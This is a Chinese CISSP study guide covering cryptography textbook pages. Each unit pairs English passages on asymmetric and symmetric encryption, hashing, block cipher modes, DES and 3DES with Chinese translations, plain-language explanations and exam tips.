场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 31 / PDF P402

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

using a hashing algorithm (you'll find more on hashing algorithms in the next section). Bob then encrypts that digest using his private key. Any user who wants to verify the signature simply decrypts the message digest using Bob's public key and then verifies that the decrypted message digest is accurate. Chapter 7 explains this process in greater detail. The following is a list of the major strengths of asymmetric key cryptography: The addition of new users requires the generation of only one public-private key pair. This same key pair is used to communicate with all users of the asymmetric cryptosystem. This makes the algorithm extremely scalable.

Users can be removed far more easily from asymmetric systems. Asymmetric cryptosystems provide a key revocation mechanism that allows a key to be canceled, effectively removing a user from the system. Key regeneration is required only when a user's private key is compromised. If a user leaves the community, the system administrator simply needs to invalidate that user's keys. No other keys are compromised and therefore key regeneration is not required for any other user. Asymmetric key encryption can provide confidentiality, integrity, authentication, and nonrepudiation.

If a user does not share their private key with other individuals, a message signed by that user can be shown to be accurate and from a specific source and cannot be later repudiated. Asymmetric cryptography may be used to create digital signatures that provide nonrepudiation, as discussed in Chapter 7. Key distribution is a simple process. Users who want to participate in the system simply make their public key available to anyone with whom they want to communicate. There is no method by which the private key can be derived from the public key. No preexisting communication link needs to exist. Two individuals can begin communicating securely from the moment they start communicating.

Asymmetric cryptography does not require a preexisting relationship to provide a secure mechanism for data exchange. The major weakness of public key cryptography is its slow speed of operation. For this reason, many applications that require the secure transmission of large amounts of data use public key cryptography to establish a connection and then exchange a symmetric secret key. The remainder of the session then

中文直译 / 整理

使用哈希算法(您将在下一节中找到更多关于哈希算法的信息)。 然后,鲍勃 使用他的私钥对该摘要进行加密。 任何想要验证签名的用户只需使用鲍勃的公 钥解密消息摘要,然后验证解密后的消息摘要是否准确。 第7章更详细地解释了 这一过程。 以下是非对称密钥加密的主要优势列表: 添加新用户只需生成一对公私钥。 这对密钥可用于与非对称加密系统中的所有 用户通信。 这使得该算法具有极高的可扩展性。 从非对称系统中移除用户要容易得多。 非对称加密系统提供密钥吊销机制,允 许吊销密钥,从而有效将用户从系统中移除。 仅当用户的私钥泄露时才需要重新生成密钥。 如果用户离开该群体,系统管理 员只需使该用户的密钥失效即可。 其他密钥不会受到影响,因此无需为其他用 户重新生成密钥。 非对称密钥加密可提供机密性、完整性、认证和不可否认性性。 如果用户不将其私 钥与其他人员共享,则该用户签名的消息可以被证明是准确且来自特定来源的, 且事后无法否认。 非对称加密可用于创建数字签名以提供不可否认性性,如 第7章 所述。 密钥分发是一个简单的过程。 希望参与系统的用户只需向其希望通信的任何人 提供其公钥。 无法通过公钥推导出私钥。 无需预先存在的通信链接。

两个人可以在开始通信的瞬间就开始安全通信。 非 对称加密不需要预先存在的关系即可提供安全的数据交换机制。 公钥加密的主要弱点是其运行速度较慢。 因此,许多需要安全传输大量数据的 应用程序使用公钥加密来建立连接,然后交换对称密钥。 会话的其余部分则

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
学习单元 32 / PDF P403

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

uses symmetric cryptography. This approach of combining symmetric and asymmetric cryptography is known as hybrid cryptography. Table 6.8 compares the symmetric and asymmetric cryptography systems. Close examination of this table reveals that a weakness in one system is matched by a strength in the other.

TABLE 6.8 Comparison of symmetric and asymmetric cryptography systems Symmetric Asymmetric Single shared key Key pair sets Out-of-band exchange In-band exchange Not scalable Scalable Fast Slow Bulk encryption Small blocks of data, digital signatures, digital certificates Confidentiality Confidentiality, integrity (via hashing), authenticity, nonrepudiation (via digital signatures) Chapter 7 provides technical details on modern public key encryption algorithms and some of their applications. Hashing Algorithms In the previous section, you learned that public key cryptosystems can provide digital signature capability when used in conjunction with a message digest.

Message digests (also known as hash values or fingerprints) are fixedlength summaries of a message's content (not unlike a file checksum) produced by a hashing algorithm. It's extremely difficult, if not impossible, to derive a message from an ideal hash function, and it's very unlikely that two messages will produce the same hash value. Cases where a hash function produces the same message digest value for two different messages are known as collisions, and the existence of collisions typically leads to the deprecation of a hashing algorithm.

中文直译 / 整理

使用对称加密。 这种将对称加密与非对称加密结合的方法称为混合加密。 表6.8比较了对称和非对称加密系统。 仔细检查该表可以发现,一种系统的 弱点恰好对应另一种系统的优点。 表6.8对称与非对称加密系统的比较 对称 非对称 单个共享 key 密钥对集合 带外交换 带内交换 不可扩展 可扩展 Fast Slow Bulk 加密 小数据块、数字签名、数字证书 机密性 机密性、完整性(通过哈希)、真实性、不可否认性性 (通过数字签名) 第7章提供了有关现代公钥加密算法及其一些应用的技术细节。 哈希算法 在上一节中,您了解到公钥密码系统在与消息摘要结合使用时,可以提供数字 签名功能。 消息摘要(也称为哈希值或指纹)是由哈希算法生成的消息内容的 固定长度摘要(类似于文件校验和)。 从理想的哈希函数中推导出原始消息极 其困难,甚至不可能,而且两个消息产生相同哈希值的可能性极低。 当哈希函 数为两个不同的消息生成相同的消息摘要值时,这种情况被称为碰撞,碰撞的 存在通常会导致哈希算法被弃用。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

证书、签名、强认证常支持真实性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
学习单元 33 / PDF P404

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Chapter 7 provides details on contemporary hashing algorithms and explains how they are used to provide digital signature capability, which helps meet the cryptographic goals of integrity and nonrepudiation. Symmetric Cryptography You've learned the basic concepts underlying symmetric key cryptography, asymmetric key cryptography, and hashing functions. In this section, we'll take an in-depth look at several common symmetric cryptosystems. Block Cipher Modes of Operation The symmetric key cryptography block cipher modes of operation describe the different ways that cryptographic algorithms may transform data to achieve sufficient complexity that offers protection against attack.

The major modes of operation are: Electronic Codebook (ECB) mode Cipher Block Chaining (CBC) mode Cipher Feedback (CFB) mode Output Feedback (OFB) mode Counter (CTR) mode Galois/Counter mode (GCM) Counter with Cipher Block Chaining Message Authentication Code (CCM) mode Electronic Codebook Mode Electronic Codebook (ECB) mode is the simplest mode to understand and the least secure. Each time the algorithm processes a fixed block of data, it simply encrypts the block using the chosen secret key. This means that if the algorithm encounters the same block multiple times, it will produce the same encrypted block.

If an enemy were eavesdropping on the communications, they could simply build a “codebook” of all the possible encrypted values. After a sufficient number of blocks were gathered, cryptanalytic techniques could be used to decipher some of the blocks and break the encryption scheme.

中文直译 / 整理

第7章详细介绍了现代哈希算法,并解释了它们如何用于提供数字签名功能, 以实现完整性与不可否认性性的密码学目标。 对称密码学 您已经学习了对称密钥密码学、非对称密钥密码学和哈希函数的基本概念。 在本节中,我们将深入探讨几种常见的对称加密系统。 分组密码工作模式 对称密钥密码学的分组密码工作模式描述了密码算法为实现足够复杂性以抵御 攻击而转换数据的不同方式。 主要的工作模式包括: 电子密码本(ECB)模式 密码分组链接(CBC)模式 密文反馈(CFB)模式 输出反馈(OFB)模式 计数器(CTR)模式 伽罗瓦/计数器模式(GCM) 带密码块链消息认证码的计数器模式(CCM) 电子密码本模式 电子密码本(ECB)模式是最容易理解的模式,也是最不安全的。 每次算法处 理一个固定大小的数据块时,它只是使用选定的密钥对数据块进行加密。 这意 味着,如果算法多次遇到相同的数据块,它将产生相同的加密块。 如果敌方正 在窃听通信,他们只需构建一个包含所有可能加密值的“密码本”。 在收集到 足够多的块后,就可以使用密码分析技术破解其中一些块,从而破译整个加密 方案。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

不可否认性:不可否认性让行为人事后不能抵赖自己做过某事。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

数字签名、审计日志、交易记录和证书常支持不可否认性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 34 / PDF P405

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

This vulnerability makes it impractical to use ECB mode on any but the shortest transmissions. In everyday use, ECB is used only for exchanging small amounts of data, such as keys and parameters used to initiate other cryptographic modes as well as the cells in a database. Cipher Block Chaining Mode In Cipher Block Chaining (CBC) mode, each block of unencrypted text is XORed with the block of ciphertext immediately preceding it before it is encrypted. The decryption process simply decrypts the ciphertext and reverses the XOR operation. CBC implements an initialization vector (IV) and XORs it with the first block of the message, producing a unique output every time the operation is performed.

The IV must be sent to the recipient, perhaps by tacking the IV onto the front of the completed ciphertext in plain form or by protecting it with ECB mode encryption using the same key used for the message. One important consideration when using CBC mode is that errors propagate—if one block is corrupted during transmission, it becomes impossible to decrypt that block and the next block as well. Cipher Feedback Mode Cipher Feedback (CFB) mode is the streaming cipher version of CBC. In other words, CFB operates against data produced in real time. However, instead of breaking a message into blocks, it uses memory buffers of the same block size.

As the buffer becomes full, it is encrypted and then sent to the recipients. Then the system waits for the next buffer to be filled as the new data is generated before it is in turn encrypted and then transmitted. Other than the change from preexisting data to real-time data, CFB operates in the same fashion as CBC. It uses an IV, and it uses chaining. Output Feedback Mode In Output Feedback (OFB) mode, ciphers operate in almost the same fashion as they do in CFB mode. However, instead of XORing an encrypted version of the previous block of ciphertext, OFB XORs the plaintext with a seed value. For the first encrypted block, an IV is used to create the seed value.

Future seed values are derived by running the algorithm on the previous seed value. The major advantages of OFB mode are that there is no chaining function and transmission errors do not propagate to affect the decryption of future blocks. Counter Mode

中文直译 / 整理

这种漏洞使得ECB模式仅适用于极短的传输,而在日常使用中,ECB仅用 于交换少量数据,例如用于启动其他加密模式的密钥和参数,以及数据库 中的单元格。 密码分组链接模式 在 密码分组链接(CBC) 模式中,每个未加密的明文块在加密前会与前一个密 文块进行异或运算。 解密过程只需对密文进行解密并逆转异或运算即可。 CBC 模式使用初始化向量(IV),并将其与消息的第一个块进行异或运算,从而在 每次执行操作时产生唯一的输出。 IV 必须发送给接收方,可以通过将 IV 以明 文形式附加到已完成密文的开头,或使用与消息相同的密钥通过 ECB 模式加密 来保护它。 使用 CBC 模式时的一个重要考虑因素是错误会传播——如果传输过 程中有一个块被损坏,则该块和下一个块都将无法解密。 密码反馈模式 密码反馈(CFB) 模式是 CBC 的流密码版本。 换句话说,CFB 针对实时生成 的数据进行操作。 然而,它不是将消息拆分为块,而是使用与块大小相同的内 存缓冲区。 当缓冲区填满时,对其进行加密并发送给接收方。 然后系统等待下 一个缓冲区被填满,因为新数据生成后会再次被加密并传输。

除了从预存数据 变为实时数据外,CFB 的操作方式与 CBC 相同。 它使用 IV 和链式结构。 输出反馈模式 在输出反馈(OFB)模式中,密码的运行方式几乎与CFB模式相同。 然而, OFB模式不是将前一个密文块的加密版本进行异或,而是将明文与一个种子值 进行异或。 对于第一个加密块,使用IV来生成种子值。 后续的种子值通过在前 一个种子值上运行算法得出。 OFB模式的主要优势在于没有链式函数,且传输 错误不会传播以影响后续块的解密。 计数器模式

小白解释

场景先行:你是公司的安全负责人,正在读第 405 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
学习单元 35 / PDF P406

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Counter (CTR) mode uses a stream cipher similar to that used in CFB and OFB modes. However, instead of creating the seed value for each encryption/decryption operation from the results of the previous seed values, it uses a simple counter that increments for each operation. As with OFB mode, errors do not propagate in CTR mode. CTR mode allows you to break an encryption or decryption operation into multiple independent steps. This makes CTR mode well suited for use in parallel computing.

Galois/Counter Mode Galois/Counter mode (GCM) takes the standard CTR mode of encryption and adds data authenticity controls to the mix, providing the recipient assurances of the integrity of the data received. This is done by adding authentication tags to the encryption process. Counter with Cipher Block Chaining Message Authentication Code Mode Similar to GCM, Counter with Cipher Block Chaining Message Authentication Code mode (CCM) combines a confidentiality mode with a data authenticity process. In this case, CCM ciphers combine the Counter (CTR) mode for confidentiality with the Cipher Block Chaining Message Authentication Code (CBC-MAC) algorithm for data authenticity.

Currently, CCM is used only with block ciphers that have a 128-bit block length (such as the AES algorithm) and require the use of a nonce that must be changed for each transmission. GCM and CCM modes both include data authenticity in addition to confidentiality. They are, therefore, known as authenticated modes of encryption. ECB, CBC, CFB, OFB, and CTR modes only provide confidentiality and are, therefore, known as unauthenticated modes. Data Encryption Standard

中文直译 / 整理

计数器(CTR)模式使用与CFB和OFB模式类似的流密码。 然而,它不是通过 前一个种子值的结果为每次加密/解密操作生成种子值,而是使用一个为每次操 作递增的简单计数器。 与OFB模式一样,CTR模式中的错误也不会传播。 CTR 模式允许您将加密或解密操作分解为多个独立的步骤。 这使得 CTR 模式非常适合用于并行计算。 伽罗瓦/计数器模式 伽罗瓦/计数器模式(GCM) 在标准的 CTR 加密模式基础上增加了数据真实性 控制,为接收方提供所接收数据完整性的保证。 这是通过在加密过程中添加 认 证标签 实现的。 带密码块链接消息认证码的计数器模式 与 GCM 类似,带密码块链接消息 认证码模式(CCM) 将保密模式与数据真实性过程相结合。 在此情况下, CCM 密码将用于保密的计数器(CTR)模式与用于数据真实性的密码块链 接消息认证码(CBC‑MAC)算法相结合。 目前,CCM 仅与具有 128 位分组长度的分组密码(如 AES 算法)一起使用, 并且要求为每次传输使用一个必须更改的随机数。 GCM 和 CCM 模式都包含了数据真实性,而不仅仅是机密性。 因此, 它们被称为认证加密模式。

ECB、CBC、CFB、OFB 和 CTR 模式仅提供 机密性,因此被称为非认证加密模式。 数据加密标准

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

证书、签名、强认证常支持真实性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 36 / PDF P407

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

The U.S. government published the Data Encryption Standard (DES) in 1977 as a proposed standard cryptosystem for all government communications. Because of flaws in the algorithm, cryptographers and the federal government no longer consider DES secure. It is widely believed that intelligence agencies routinely decrypt DES-encrypted information. DES was superseded by the Advanced Encryption Standard in December 2001. It is still important to understand DES because it is the building block of Triple DES (3DES), a stronger encryption algorithm discussed in the next section.

DES is a 64-bit block cipher that has five modes of operation: Electronic Codebook (ECB) mode, Cipher Block Chaining (CBC) mode, Cipher Feedback (CFB) mode, Output Feedback (OFB) mode, and Counter (CTR) mode. All of the DES modes operate on 64 bits of plaintext at a time to generate 64-bit blocks of ciphertext. The key used by DES is 56 bits long. DES uses a long series of exclusive OR (XOR) operations to generate the ciphertext. This process is repeated 16 times for each encryption/decryption operation. Each repetition is commonly referred to as a round of encryption, explaining the statement that DES performs 16 rounds of encryption.

Each round generates a new key that is then used as the input to subsequent rounds. As mentioned, DES uses a 56-bit key to drive the encryption and decryption process. However, you may read in some literature that DES uses a 64-bit key. This is not an inconsistency—there's a perfectly logical explanation. The DES specification calls for a 64-bit key. However, of those 64 bits, only 56 actually contain keying information. The remaining 8 bits are supposed to contain parity information to ensure that the other 56 bits are accurate. In practice, however, those parity bits are rarely used. You should commit the 56-bit figure to memory.

Triple DES As mentioned in previous sections, the Data Encryption Standard's (DES) 56- bit key is no longer considered adequate in the face of modern cryptanalytic techniques and supercomputing power. However, an adapted version of DES, Triple DES (3DES), uses the same algorithm to produce encryption that is stronger but that is no longer considered adequate to meet modern

中文直译 / 整理

美国政府于1977年发布了数据加密标准(DES),作为所有政府通信的推荐加 密系统。 由于该算法存在缺陷,密码学家和联邦政府已不再认为 DES 是安全的。 人们普遍认为,情报机构 routinely 解密 DES 加密的信息。 DES 于 2001 年 12 月被高级加密标准取代。 理解 DES 仍然很重要,因为它是三重 DES( 3DES)的构建基础,3DES 是一种更强的加密算法,将在下一节中讨论。 DES是一种64位分组密码,具有五种操作模式:电子密码本(ECB)模式、密 码分组链接(CBC)模式、密码反馈(CFB)模式、输出反馈(OFB)模式和 计数器(CTR)模式。 所有DES模式每次均对64位明文进行操作,生成64位的 密文。 DES使用的密钥长度为56位。 DES使用一系列长时间的异或(XOR)运算来生成密文。 此过程在每次加密/ 解密操作中重复16次。 每次重复通常被称为一个轮加密,这解释了为什么说 DES执行16轮加密。 每轮都会生成一个新的密钥,然后作为下一轮的输入。 如前所述,DES使用56位密钥来驱动加密和解密过程。 然而,你可能 在某些文献中读到DES使用64位密钥。

这并非不一致——其中有着完全合 理的解释。 DES规范要求使用64位密钥。 然而,在这64位中,只有56位包 含密钥信息,其余8位本应包含奇偶校验信息,以确保其他56位的准确性。 但在实际应用中,这些奇偶校验位很少被使用。 你应该牢记56位这一数值。 三重DES 如前几节所述,数据加密标准(DES)的56位密钥在现代密码分析技术和超级 计算能力面前已不再被认为足够安全。 然而,DES的一个改进版本三重DES (3DES)使用相同的算法生成更强的加密,但已不再被认为足以满足现代

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 37 / PDF P408

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

requirements. For this reason, 3DES encryption should be avoided, although it may still be supported by some products. As of January 1, 2024, the U.S. federal government formally disallowed the use of 3DES for government data. The algorithm is still used in private industry. There are several different variants of 3DES that each use different numbers of independent keys. The first two, DES-EDE3 and DES-EEE3, use three independent keys: K1, K2, and K3. The difference between the two are the operations used, which are represented by the letter E for encryption and D for decryption.

DES-EDE3 encrypts the data with K1, decrypts the resulting ciphertext with K2, and then encrypts that text with K3. DES-EDE3 can be expressed using the following notation, where E(K,P) represents the encryption of plaintext P with key K, and D(K,C) represents the decryption of ciphertext C with key K: E(K1,D(K2,E(K3,P))) DES-EEE3, on the other hand, encrypts the data with all three keys in sequential order, and may be represented as follows: E(K1,E(K2,E(K3,P))) If you find yourself wondering why there is a decryption operation in the middle of EDE3 mode, that's an arcane artifact of the process used to create the algorithm and provide backward compatibility with DES.

Encryption and decryption are reversible operations, so even though the decryption function is used, it can still be thought of as a round of encryption. Mathematically, DES-EEE3 and DES-EDE3 should have an effective key length of 168 bits. However, known attacks against this algorithm reduce the effective strength to 112 bits.

中文直译 / 整理

